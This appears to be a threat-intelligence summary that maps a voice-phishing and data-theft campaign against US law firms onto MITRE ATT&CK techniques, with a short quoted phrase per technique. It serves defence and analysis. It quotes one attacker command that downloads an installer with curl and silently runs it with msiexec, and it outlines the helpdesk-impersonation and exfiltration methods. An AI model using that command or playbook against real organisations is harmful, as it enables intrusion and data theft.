Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

MITRE Techniques

• [T1566.004] Phishing: Spearphishing Voice – Used vishing calls while impersonating IT staff to direct victims into screen-sharing sessions and remote access setup (‘acting as members of the organization’s internal IT helpdesk or security team, threat actors place direct calls’).
• [T1133] External Remote Services – Gained access through remote desktop/support services and VDI/VPN-enabled remote environments (‘join a screen-sharing session’ and access corporate VDI).
• [T1204.002] User Execution: Malicious File – Tricked users into downloading and executing installers and payloads such as RMM agents (‘convincing the target to download and execute a payload’).
• [T1059.001] Command and Scripting Interpreter: PowerShell – Inferred by the article’s MITRE list and remote execution activity that used scripted administrative actions (‘download and execute a payload via a cURL command’).
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Used command-line execution to launch installers and scripts (‘curl -sL … -o “SuperOps.msi” && msiexec /i “SuperOps.msi” /quiet’).
• [T1569.002] System Services: Service Execution – Installed software through system service-based execution such as MSI installation (‘msiexec /i “SuperOps.msi” /quiet’).
• [T1053.005] Scheduled Task/Job: Scheduled Task – Listed as a technique in the campaign’s MITRE mapping, indicating use of scheduled execution for persistence (‘Scheduled Task/Job: Scheduled Task’).
• [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – Listed as a persistence method in the MITRE mapping (‘Registry Run Keys’).
• [T1036.005] Masquerading: Match Legitimate Name or Location – Used brand-like folder names and legitimate-looking lures to blend in (‘folders explicitly renamed to mimic the victim organization’s branding’).
• [T1553.002] Subvert Trust Controls: Code Signing – Listed in the MITRE mapping, indicating abuse of trusted software or signed binaries (‘Subvert Trust Controls: Code Signing’).
• [T1562.001] Impair Defenses: Disable or Modify Tools – Attempted to evade controls by using tools and methods that bypass endpoint restrictions (‘bypass conventional automated boundary security and email filtering controls’).
• [T1070.001] Indicator Removal: Clear Windows Event Logs – Listed in the MITRE mapping, suggesting log cleanup to hide activity (‘Clear Windows Event Logs’).
• [T1003.001] OS Credential Dumping: LSASS Memory – Listed in the MITRE mapping as a credential access technique (‘LSASS Memory’).
• [T1003.002] OS Credential Dumping: Security Account Manager – Listed in the MITRE mapping as another credential dumping technique (‘Security Account Manager’).
• [T1083] File and Directory Discovery – Enumerated local directories, OneDrive folders, and network drives to find valuable data (‘map local directories, enumerate active OneDrive folders, and crawl mapped network drives’).
• [T1135] Network Share Discovery – Searched mapped network drives and shared resources to locate target repositories (‘crawl mapped network drives’).
• [T1046] Network Service Discovery – Listed in the MITRE mapping, consistent with discovery of accessible services and network paths (‘Network Service Discovery’).
• [T1219] Remote Access Software – Abused commercial remote access tools such as AnyDesk, Bomgar, Zoho Assist, Zoom, Teams, and Quick Assist (‘download AnyDesk, Bomgar, or Zoho Assist installers’).
• [T1021.001] Remote Services: Remote Desktop Protocol – Used native remote desktop/virtual desktop services during access and pivoting (‘Microsoft Terminal Services’ and VDI sessions).
• [T1021.004] Remote Services: SSH – Used SSH-based transfer tools and monitored SSH traffic during exfiltration (‘Monitor SSH traffic (Port 22) from internal VDIs’).
• [T1005] Data from Local System – Collected files from local endpoints, Downloads folders, Roaming profiles, and OneDrive (‘staged results are compiled … inside the user’s Downloads folder’).
• [T1572] Protocol Tunneling – Listed in the MITRE mapping, indicating use of network tunneling or relayed channels (‘Protocol Tunneling’).
• [T1020] Automated Exfiltration – Automated large-scale transfers with tools like WinSCP and Rclone (‘frequently use portable versions of WinSCP or Rclone’).
• [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – Uploaded stolen data to Google Drive and consumer file-sharing accounts (‘batch upload the stolen files’).
• [T1052.001] Exfiltration Over Physical Medium – Attempted to copy data to USB storage during in-person office access (‘exfiltrate corporate data directly to an external drive’).
• [T1486] Data Encrypted for Impact – Listed in the MITRE section, though the campaign described focused on extortion rather than encryption (‘Data Encrypted for Impact’).